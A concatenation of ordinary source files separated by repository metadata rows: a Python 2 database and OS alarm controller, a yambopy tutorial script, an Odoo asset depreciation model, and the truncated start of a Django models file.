send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'critical','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',3,host,'',create_time,'load',load_1,'critical')
elif int(load_1) >= int(threshold_warning_os_load):
send_mail = func.update_send_mail_status(server_id,db_type,'load',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'warning','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',2,host,'',create_time,'load',load_1,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'load',load_1,'load ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',1,host,'',create_time,'load',load_1,'ok')
if int(alarm_os_cpu)==1:
threshold_critical_os_cpu = int(100-threshold_critical_os_cpu)
threshold_warning_os_cpu = int(100-threshold_warning_os_cpu)
if int(cpu_idle) <= int(threshold_critical_os_cpu):
send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','critical','too little cpu idle',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',3,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','critical')
elif int(cpu_idle) <= int(threshold_warning_os_cpu):
send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','warning','too little cpu idle',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',2,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','cpu idle ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',1,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','ok')
if int(alarm_os_memory)==1:
if memory_usage:
memory_usage_int = int(memory_usage.split('%')[0])
else:
memory_usage_int = 0
if int(memory_usage_int) >= int(threshold_critical_os_memory):
send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'critical','too more memory usage',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',3,host,'',create_time,'memory',memory_usage,'critical')
elif int(memory_usage_int) >= int(threshold_warning_os_memory):
send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'warning','too more memory usage',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',2,host,'',create_time,'memory',memory_usage,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'memory usage ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',1,host,'',create_time,'memory',memory_usage,'ok')
else:
pass
def get_alarm_os_disk():
sql="select a.ip,a.mounted,a.used_rate,a.create_time,b.tags,b.alarm_os_disk,b.threshold_warning_os_disk,b.threshold_critical_os_disk,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_disk a,db_cfg_os b where a.ip=b.host group by ip,mounted order by SUBSTRING_INDEX(used_rate,'%',1)+0 asc;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
mounted=line[1]
used_rate=line[2]
create_time=line[3]
tags=line[4]
alarm_os_disk=line[5]
threshold_warning_os_disk=line[6]
threshold_critical_os_disk=line[7]
send_mail=line[8]
send_mail_to_list=line[9]
send_sms=line[10]
send_sms_to_list=line[11]
server_id=0
tags=tags
db_type="os"
port=''
used_rate_arr=used_rate.split("%")
used_rate_int=int(used_rate_arr[0])
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_os_disk)==1:
if int(used_rate_int) >= int(threshold_critical_os_disk):
send_mail = func.update_send_mail_status(host,db_type,'disk_usage(%s)' %(mounted),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'disk_usage(%s)' %(mounted),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'critical','disk %s usage reach %s' %(mounted,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',3,host,'',create_time,'disk_usage(%s)' %(mounted),used_rate,'critical')
elif int(used_rate_int) >= int(threshold_warning_os_disk):
send_mail = func.update_send_mail_status(host,db_type,'disk_usage(%s)' %(mounted),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'disk_usage(%s)' %(mounted),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'warning','disk %s usage reach %s' %(mounted,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',2,host,'',create_time,'disk_usage(%s)' %(mounted),used_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'disk_usage(%s)' %(mounted),used_rate,'disk %s usage ok' %(mounted),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('disk',1,host,'',create_time,'disk_usage','max(%s:%s)' %(mounted,used_rate),'ok')
else:
pass
def get_alarm_os_network():
sql="select a.ip,a.if_descr,a.in_bytes,a.out_bytes,sum(in_bytes+out_bytes) sum_bytes,a.create_time,b.tags,b.alarm_os_network,b.threshold_warning_os_network,b.threshold_critical_os_network,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_net a,db_cfg_os b where a.ip=b.host group by ip,if_descr order by sum(in_bytes+out_bytes) asc;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
if_descr=line[1]
in_bytes=line[2]
out_bytes=line[3]
sum_bytes=line[4]
create_time=line[5]
tags=line[6]
alarm_os_network=line[7]
threshold_warning_os_network=(line[8])*1024*1024
threshold_critical_os_network=(line[9])*1024*1024
send_mail=line[10]
send_mail_to_list=line[11]
send_sms=line[12]
send_sms_to_list=line[13]
server_id=0
tags=tags
db_type="os"
port=''
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_os_network)==1:
if int(sum_bytes) >= int(threshold_critical_os_network):
send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)' %(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',3,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical')
elif int(sum_bytes) >= int(threshold_warning_os_network):
send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',2,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'network %s bytes ok' %(if_descr),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('network',1,host,'',create_time,'network','max(%s-in:%s,out:%s)' %(if_descr,in_bytes,out_bytes),'ok')
else:
pass
def send_alarm():
sql = "select tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,id alarm_id from alarm;"
result=func.mysql_query(sql)
if result <> 0:
send_alarm_mail = func.get_option('send_alarm_mail')
send_alarm_sms = func.get_option('send_alarm_sms')
for line in result:
tags=line[0]
host=line[1]
port=line[2]
create_time=line[3]
db_type=line[4]
alarm_item=line[5]
alarm_value=line[6]
level=line[7]
message=line[8]
send_mail=line[9]
send_mail_to_list=line[10]
send_sms=line[11]
send_sms_to_list=line[12]
alarm_id=line[13]
if port:
server = host+':'+port
else:
server = host
if send_mail_to_list:
mail_to_list=send_mail_to_list.split(';')
else:
send_mail=0
if send_sms_to_list:
sms_to_list=send_sms_to_list.split(';')
else:
send_sms=0
if int(send_alarm_mail)==1:
if send_mail==1:
mail_subject='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
mail_content="""
Type: %s\n<br/>
Tags: %s\n<br/>
Host: %s:%s\n<br/>
Level: %s\n<br/>
Item: %s\n<br/>
Value: %s\n<br/>
Message: %s\n<br/>
""" %(db_type,tags,host,port,level,alarm_item,alarm_value,message)
result = sendmail.send_mail(mail_to_list,mail_subject,mail_content)
if result:
send_mail_status=1
else:
send_mail_status=0
else:
send_mail_status=0
else:
send_mail_status=0
if int(send_alarm_sms)==1:
if send_sms==1:
sms_msg='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
send_sms_type = func.get_option('smstype')
if send_sms_type == 'fetion':
result = sendsms_fx.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
else:
result = sendsms_api.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
if result:
send_sms_status=1
else:
send_sms_status=0
else:
send_sms_status=0
else:
send_sms_status=0
try:
sql="insert into alarm_history(server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,send_mail_status,send_sms_status) select server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,%s,%s from alarm where id=%s;"
param=(send_mail_status,send_sms_status,alarm_id)
func.mysql_exec(sql,param)
except Exception, e:
print e
func.mysql_exec("delete from alarm",'')
else:
pass
def check_send_alarm_sleep():
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
send_sms_sleep_time = func.get_option('send_sms_sleep_time')
if send_mail_sleep_time:
now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
format="%Y-%m-%d %H:%M:%S"
send_mail_sleep_time_format = "%d" %(int(send_mail_sleep_time))
result=datetime.datetime(*time.strptime(now_time,format)[:6])-datetime.timedelta(minutes=int(send_mail_sleep_time_format))
sleep_alarm_time= result.strftime(format)
sql="delete from alarm_temp where alarm_type='mail' and create_time <= '%s' " %(sleep_alarm_time)
param=()
func.mysql_exec(sql,param)
if send_sms_sleep_time:
now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
format="%Y-%m-%d %H:%M:%S"
send_sms_sleep_time_format = "%d" %(int(send_sms_sleep_time))
result=datetime.datetime(*time.strptime(now_time,format)[:6])-datetime.timedelta(minutes=int(send_sms_sleep_time_format))
sleep_alarm_time= result.strftime(format)
sql="delete from alarm_temp where alarm_type='sms' and create_time <= '%s' " %(sleep_alarm_time)
param=()
func.mysql_exec(sql,param)
def main():
logger.info("alarm controller started.")
check_send_alarm_sleep()
monitor_mysql = func.get_option('monitor_mysql')
monitor_mongodb = func.get_option('monitor_mongodb')
monitor_sqlserver = func.get_option('monitor_sqlserver')
monitor_oracle = func.get_option('monitor_oracle')
monitor_redis = func.get_option('monitor_redis')
monitor_os = func.get_option('monitor_os')
if monitor_mysql=="1":
get_alarm_mysql_status()
get_alarm_mysql_replcation()
if monitor_oracle=="1":
get_alarm_oracle_status()
get_alarm_oracle_tablespace()
get_alarm_oracle_diskgroup()
if monitor_sqlserver=="1":
get_alarm_sqlserver_status()
if monitor_mongodb=="1":
get_alarm_mongodb_status()
if monitor_redis=="1":
get_alarm_redis_status()
if monitor_os=="1":
get_alarm_os_status()
get_alarm_os_disk()
get_alarm_os_network()
send_alarm()
func.update_check_time()
logger.info("alarm controller finished.")
if __name__ == '__main__':
main()
| apache-2.0 | 6,049,866,737,927,612,000 | 68.822222 | 591 | 0.60236 | false | 3.368187 | false | false | false |
alexandremorlet/yambopy | tutorial/bn/ip_bn.py | 5 | 1731 | #
# Author: Henrique Pereira Coutada Miranda
# Run a IP calculation using yambo
#
from __future__ import print_function
import sys
from yambopy import *
from qepy import *
import argparse
#parse options
parser = argparse.ArgumentParser(description='Test the yambopy script.')
parser.add_argument('-dg','--doublegrid', action="store_true", help='Use double grid')
parser.add_argument('-c', '--calc', action="store_true", help='calculate the IP absorption')
parser.add_argument('-p', '--plot', action="store_true", help='plot the results')
args = parser.parse_args()
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
yambo = "yambo"
folder = 'ip'
#check if the SAVE folder is present
if not os.path.isdir('database/SAVE'):
print('preparing yambo database')
os.system('mkdir -p database')
os.system('cd nscf/bn.save; p2y > p2y.log')
os.system('cd nscf/bn.save; yambo > yambo.log')
os.system('mv nscf/bn.save/SAVE database')
if not os.path.isdir(folder):
os.mkdir(folder)
os.system('cp -r database/SAVE %s'%folder)
#initialize the double grid
if args.doublegrid:
print("creating double grid")
f = open('%s/ypp.in'%folder,'w')
f.write("""kpts_map
%DbGd_DB1_paths
"../database_double"
%""")
f.close()
os.system('cd %s; ypp'%folder)
if args.calc:
#create the yambo input file
y = YamboIn('yambo -o g -V all',folder=folder)
y['FFTGvecs'] = [30,'Ry']
y['BndsRnXs'] = [1,30]
y['QpntsRXd'] = [[1,1],'']
y['ETStpsXd'] = 500
y.write('%s/yambo_run.in'%folder)
print('running yambo')
os.system('cd %s; %s -F yambo_run.in -J yambo'%(folder,yambo))
if args.plot:
#pack in a json file
y = YamboOut(folder)
y.pack()
| bsd-3-clause | 1,098,429,898,352,932,600 | 25.630769 | 92 | 0.645292 | false | 2.823817 | false | true | false |
OCA/l10n-italy | assets_management/models/asset_depreciation.py | 1 | 21256 | # Author(s): Silvio Gregorini ([email protected])
# Copyright 2019 Openforce Srls Unipersonale (www.openforce.it)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
from odoo.tools import float_compare, float_is_zero
class AssetDepreciation(models.Model):
_name = 'asset.depreciation'
_description = "Assets Depreciations"
amount_depreciable = fields.Monetary(
string="Depreciable Amount"
)
amount_depreciable_updated = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Updated Amount",
)
amount_depreciated = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Depreciated Amount",
)
amount_gain = fields.Monetary(
compute='_compute_amounts',
string="Capital Gain",
store=True,
)
amount_historical = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Historical Amount",
)
amount_in = fields.Monetary(
compute='_compute_amounts',
store=True,
string="In Amount",
)
amount_loss = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Capital Loss",
)
amount_out = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Out Amount",
)
amount_residual = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Residual Amount",
)
asset_id = fields.Many2one(
'asset.asset',
ondelete='cascade',
readonly=True,
required=True,
string="Asset",
)
base_coeff = fields.Float(
default=1,
help="Coeff to compute amount depreciable from purchase amount",
string="Depreciable Base Coeff",
)
company_id = fields.Many2one(
'res.company',
readonly=True,
related='asset_id.company_id',
string="Company"
)
currency_id = fields.Many2one(
'res.currency',
readonly=True,
related='asset_id.currency_id',
string="Currency"
)
date_start = fields.Date(
string="Date Start"
)
dismiss_move_id = fields.Many2one(
'account.move',
string="Dismiss Move"
)
first_dep_nr = fields.Integer(
default=1,
string="First Dep. Num",
)
force_all_dep_nr = fields.Boolean(
string="Force All Dep. Num"
)
force_first_dep_nr = fields.Boolean(
string="Force First Dep. Num"
)
last_depreciation_date = fields.Date(
compute='_compute_last_depreciation_date',
store=True,
string="Last Dep.",
)
line_ids = fields.One2many(
'asset.depreciation.line',
'depreciation_id',
string="Lines"
)
mode_id = fields.Many2one(
'asset.depreciation.mode',
required=True,
string="Mode",
)
percentage = fields.Float(
string="Depreciation (%)"
)
pro_rata_temporis = fields.Boolean(
string="Pro-rata Temporis"
)
requires_account_move = fields.Boolean(
readonly=True,
related='type_id.requires_account_move',
string="Requires Account Move",
)
state = fields.Selection(
[('non_depreciated', "Non Depreciated"),
('partially_depreciated', "Partially Depreciated"),
('totally_depreciated', "Depreciated")],
compute='_compute_state',
default='non_depreciated',
store=True,
string="State"
)
type_id = fields.Many2one(
'asset.depreciation.type',
string="Depreciation Type"
)
zero_depreciation_until = fields.Date(
string="Zero Depreciation Up To"
)
@api.model
def create(self, vals):
dep = super().create(vals)
dep.normalize_first_dep_nr()
if dep.line_ids:
num_lines = dep.line_ids.filtered('requires_depreciation_nr')
if num_lines:
num_lines.normalize_depreciation_nr()
return dep
@api.multi
def write(self, vals):
res = super().write(vals)
need_norm = self.filtered(lambda d: d.need_normalize_first_dep_nr())
if need_norm:
need_norm.normalize_first_dep_nr(force=True)
for dep in self:
num_lines = dep.line_ids.filtered('requires_depreciation_nr')
if num_lines and num_lines.need_normalize_depreciation_nr():
num_lines.normalize_depreciation_nr(force=True)
return res
@api.multi
def unlink(self):
if self.mapped('line_ids'):
raise ValidationError(
_("Cannot delete depreciations if there is any depreciation"
" line linked to it.")
)
if any([m.state != 'draft' for m in self.mapped('dismiss_move_id')]):
deps = self.filtered(
lambda l: l.dismiss_move_id
and l.dismiss_move_id.state != 'draft'
)
name_list = "\n".join([l[-1] for l in deps.name_get()])
raise ValidationError(
_("Following lines are linked to posted account moves, and"
" cannot be deleted:\n{}").format(name_list)
)
return super().unlink()
@api.multi
def name_get(self):
return [(dep.id, dep.make_name()) for dep in self]
@api.multi
@api.depends(
'amount_depreciable', 'amount_depreciable_updated', 'amount_residual'
)
def _compute_state(self):
for dep in self:
dep.state = dep.get_depreciation_state()
@api.onchange('asset_id', 'base_coeff')
def onchange_base_coeff(self):
purchase_amount = self.asset_id.purchase_amount
self.amount_depreciable = self.base_coeff * purchase_amount
@api.onchange('first_dep_nr')
def onchange_normalize_first_dep_nr(self):
if self.first_dep_nr <= 0:
self.first_dep_nr = 1
@api.onchange('force_all_dep_nr')
def onchange_force_all_dep_nr(self):
if self.force_all_dep_nr:
self.first_dep_nr = 1
@api.onchange('force_first_dep_nr')
def onchange_force_first_dep_nr(self):
if self.force_first_dep_nr and self.first_dep_nr <= 0:
self.first_dep_nr = 1
@api.onchange('force_all_dep_nr', 'force_first_dep_nr')
def onchange_force_dep_nrs(self):
if self.force_all_dep_nr and self.force_first_dep_nr:
self.force_all_dep_nr = False
self.force_first_dep_nr = False
title = _("Warning!")
msg = _(
"Fields `Force All Dep. Num` and `Force First Dep. Num`"
" cannot be both active."
)
return {'warning': {'title': title, 'message': msg}}
if not self.force_all_dep_nr and self.force_first_dep_nr:
self.first_dep_nr = 1
@api.multi
@api.depends('amount_depreciable',
'line_ids.amount',
'line_ids.balance',
'line_ids.move_type',
'asset_id.sold')
def _compute_amounts(self):
for dep in self:
vals = dep.get_computed_amounts()
dep.update(vals)
@api.multi
@api.depends('line_ids', 'line_ids.date', 'line_ids.move_type')
def _compute_last_depreciation_date(self):
"""
Update date upon deps with at least one depreciation line (excluding
partial dismissal); else set field to False
"""
for dep in self:
dep_lines = dep.line_ids.filtered(
lambda l: l.move_type == 'depreciated'
and not l.partial_dismissal
)
if dep_lines:
dep.last_depreciation_date = max(dep_lines.mapped('date'))
else:
dep.last_depreciation_date = False
def check_before_generate_depreciation_lines(self, dep_date):
# Check if self is a valid recordset
if not self:
raise ValidationError(
_("Cannot create any depreciation according to current"
" settings.")
)
lines = self.mapped('line_ids')
# Check if any depreciation already has newer depreciation lines
# than the given date
newer_lines = lines.filtered(
lambda l: l.move_type == 'depreciated'
and not l.partial_dismissal
and l.date > dep_date
)
if newer_lines:
asset_names = ', '.join([
asset_name for asset_id, asset_name in
newer_lines.mapped('depreciation_id.asset_id').name_get()
])
raise ValidationError(
_("Cannot update the following assets which contain"
" newer depreciations for the chosen types:\n{}")
.format(asset_names)
)
posted_lines = lines.filtered(
lambda l: l.date == dep_date
and l.move_id
and l.move_id.state != 'draft'
)
if posted_lines:
posted_names = ', '.join([
asset_name for asset_id, asset_name in
posted_lines.mapped('depreciation_id.asset_id').name_get()
])
raise ValidationError(
_("Cannot update the following assets which contain"
" posted depreciation for the chosen date and types:\n{}")
.format(posted_names)
)
def generate_depreciation_lines(self, dep_date):
# Set new date within context if necessary
self.check_before_generate_depreciation_lines(dep_date)
new_lines = self.env['asset.depreciation.line']
for dep in self:
new_lines |= dep.generate_depreciation_lines_single(dep_date)
return new_lines
def generate_depreciation_lines_single(self, dep_date):
self.ensure_one()
dep_nr = self.get_max_depreciation_nr() + 1
dep = self.with_context(dep_nr=dep_nr, used_asset=self.asset_id.used)
dep_amount = dep.get_depreciation_amount(dep_date)
dep = dep.with_context(dep_amount=dep_amount)
vals = dep.prepare_depreciation_line_vals(dep_date)
return self.env['asset.depreciation.line'].create(vals)
def generate_dismiss_account_move(self):
self.ensure_one()
am_obj = self.env['account.move']
vals = self.get_dismiss_account_move_vals()
if 'line_ids' not in vals:
vals['line_ids'] = []
line_vals = self.get_dismiss_account_move_line_vals()
for v in line_vals:
vals['line_ids'].append((0, 0, v))
self.dismiss_move_id = am_obj.create(vals)
def get_computed_amounts(self):
self.ensure_one()
vals = {
'amount_{}'.format(k): abs(v)
for k, v in self.line_ids.get_balances_grouped().items()
if 'amount_{}'.format(k) in self._fields
}
if self.asset_id.sold:
vals.update({
'amount_depreciable_updated': 0,
'amount_residual': 0
})
else:
non_residual_types = self.line_ids.get_non_residual_move_types()
update_move_types = self.line_ids.get_update_move_types()
amt_dep = self.amount_depreciable
vals.update({
'amount_depreciable_updated': amt_dep + sum([
l.balance for l in self.line_ids
if l.move_type in update_move_types
]),
'amount_residual': amt_dep + sum([
l.balance for l in self.line_ids
if l.move_type not in non_residual_types
])
})
return vals
def get_depreciable_amount(self, dep_date=None):
types = self.line_ids.get_update_move_types()
return self.amount_depreciable + sum([
l.balance for l in self.line_ids
if l.move_type in types and (not dep_date or l.date <= dep_date)
])
def get_depreciation_amount(self, dep_date):
self.ensure_one()
zero_dep_date = self.zero_depreciation_until
if zero_dep_date and dep_date <= zero_dep_date:
return 0
# Get depreciable amount, multiplier and digits
amount = self.get_depreciable_amount(dep_date)
multiplier = self.get_depreciation_amount_multiplier(dep_date)
digits = self.env['decimal.precision'].precision_get('Account')
dep_amount = round(amount * multiplier, digits)
# If amount_residual < dep_amount: use amount_residual as dep_amount
if float_compare(self.amount_residual, dep_amount, digits) < 0:
dep_amount = self.amount_residual
return dep_amount
def get_depreciation_amount_multiplier(self, dep_date):
self.ensure_one()
# Base multiplier
multiplier = self.percentage / 100
# Update multiplier from depreciation mode data
multiplier *= self.mode_id.get_depreciation_amount_multiplier()
# Update multiplier from pro-rata temporis
date_start = self.date_start
if dep_date < date_start:
dt_start_str = fields.Date.from_string(date_start).strftime(
'%d-%m-%Y'
)
raise ValidationError(
_("Depreciations cannot start before {}.").format(dt_start_str)
)
if self.pro_rata_temporis or self._context.get('force_prorata'):
fiscal_year_obj = self.env['account.fiscal.year']
fy_start = fiscal_year_obj.get_fiscal_year_by_date(
date_start, company=self.company_id
)
fy_dep = fiscal_year_obj.get_fiscal_year_by_date(
dep_date, company=self.company_id
)
if fy_dep == fy_start:
# If current depreciation lies within the same fiscal year in
# which the asset was registered, compute multiplier as a
# difference from date_dep multiplier and start_date
# multiplier, plus 1/lapse to avoid "skipping" one day
fy_end = fields.Date.from_string(fy_dep.date_to)
fy_start = fields.Date.from_string(fy_dep.date_from)
lapse = (fy_end - fy_start).days + 1
dep_multiplier = self.get_pro_rata_temporis_multiplier(
dep_date, 'dte'
)
start_multiplier = self.get_pro_rata_temporis_multiplier(
self.date_start, 'dte'
)
multiplier *= start_multiplier - dep_multiplier + 1 / lapse
else:
# Otherwise, simply compute multiplier with respect to how
# many days have passed since the beginning of the fiscal year
multiplier *= self.get_pro_rata_temporis_multiplier(
dep_date, 'std'
)
return multiplier
def get_depreciation_state(self):
self.ensure_one()
digits = self.env['decimal.precision'].precision_get('Account')
depreciable = self.amount_depreciable
residual = self.amount_residual
updated = self.amount_depreciable_updated
if float_is_zero(depreciable, digits):
return 'non_depreciated'
elif float_is_zero(residual, digits):
return 'totally_depreciated'
elif float_compare(residual, updated, digits) < 0:
return 'partially_depreciated'
else:
return 'non_depreciated'
def get_dismiss_account_move_line_vals(self):
self.ensure_one()
credit_line_vals = {
'account_id': self.asset_id.category_id.asset_account_id.id,
'credit': self.amount_depreciated,
'debit': 0.0,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
debit_line_vals = {
'account_id': self.asset_id.category_id.fund_account_id.id,
'credit': 0.0,
'debit': self.amount_depreciated,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
return [credit_line_vals, debit_line_vals]
def get_dismiss_account_move_vals(self):
self.ensure_one()
return {
'company_id': self.company_id.id,
'date': self.asset_id.sale_date,
'journal_id': self.asset_id.category_id.journal_id.id,
'line_ids': [],
'ref': _("Asset dismissal: ") + self.asset_id.make_name(),
}
def get_max_depreciation_nr(self):
self.ensure_one()
num_lines = self.line_ids.filtered('requires_depreciation_nr')
nums = num_lines.mapped('depreciation_nr')
if not nums:
nums = [0]
return max(nums)
def get_pro_rata_temporis_dates(self, date):
"""
Gets useful dates for pro rata temporis computations, according to
given date, by retrieving its fiscal year.
:param date: given date for depreciation
:return: date objects triplet (dt_start, dt, dt_end)
- dt_start: fiscal year first day
- dt: given date
- dt_end: fiscal year last day
"""
if not date:
raise ValidationError(
_("Cannot compute pro rata temporis for unknown date.")
)
fiscal_year_obj = self.env['account.fiscal.year']
fiscal_year = fiscal_year_obj.get_fiscal_year_by_date(
date, company=self.company_id
)
if not fiscal_year:
date_str = fields.Date.from_string(date).strftime('%d/%m/%Y')
raise ValidationError(
_("No fiscal year defined for date {}") + date_str
)
return (
fields.Date.from_string(fiscal_year.date_from),
fields.Date.from_string(date),
fields.Date.from_string(fiscal_year.date_to)
)
def get_pro_rata_temporis_multiplier(self, date=None, mode='std'):
"""
Computes and returns pro rata temporis multiplier according to given
depreciation, date, fiscal year and mode
:param date: given date as a fields.Date string
:param mode: string, defines how to compute multiplier. Valid values:
- 'std': start-to-date, computes multiplier using days from fiscal
year's first day to given date;
- 'dte': date-to-end, computes multiplier using days from given
date to fiscal year's last day
"""
self.ensure_one()
if not (self.pro_rata_temporis or self._context.get('force_prorata')):
return 1
dt_start, dt, dt_end = self.get_pro_rata_temporis_dates(date)
lapse = (dt_end - dt_start).days + 1
if mode == 'std':
return ((dt - dt_start).days + 1) / lapse
elif mode == 'dte':
return ((dt_end - dt).days + 1) / lapse
elif mode:
raise NotImplementedError(
_("Cannot get pro rata temporis multiplier for mode `{}`")
.format(mode)
)
raise NotImplementedError(
_("Cannot get pro rata temporis multiplier for unspecified mode")
)
def make_name(self):
self.ensure_one()
return " - ".join((self.asset_id.make_name(), self.type_id.name or ""))
def need_normalize_first_dep_nr(self):
self.ensure_one()
if self.force_all_dep_nr:
return False
if self.force_first_dep_nr:
if self.first_dep_nr <= 0:
return True
else:
if self.first_dep_nr != 1:
return True
return False
def normalize_first_dep_nr(self, force=False):
"""
Normalize first numbered line according to `first_dep_nr` value
:param force: if True, force normalization
"""
force = force or self._context.get('force_normalize_first_dep_nr')
for d in self:
if force or d.need_normalize_first_dep_nr():
d.onchange_normalize_first_dep_nr()
def post_generate_depreciation_lines(self, lines=None):
lines = lines or self.env['asset.depreciation.line']
lines.filtered('requires_account_move').button_generate_account_move()
def prepare_depreciation_line_vals(self, dep_date):
self.ensure_one()
if dep_date is None:
raise ValidationError(
_("Cannot create a depreciation line without a date")
)
dep_amount = self._context.get('dep_amount') or 0.0
dep_year = fields.Date.from_string(dep_date).year
return {
'amount': dep_amount,
'date': dep_date,
'depreciation_id': self.id,
'move_type': 'depreciated',
'name': _("{} - Depreciation").format(dep_year)
}
| agpl-3.0 | 560,865,373,787,391,300 | 32.845541 | 79 | 0.563867 | false | 3.890719 | false | false | false |
Fakor/congov | web/engine_integration/models.py | 1 | 1444 | from django.db import models
class Blueprint(models.Model):
name = models.CharField(max_length=30)
class MineBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class FactoryBlueprint(models.Model):
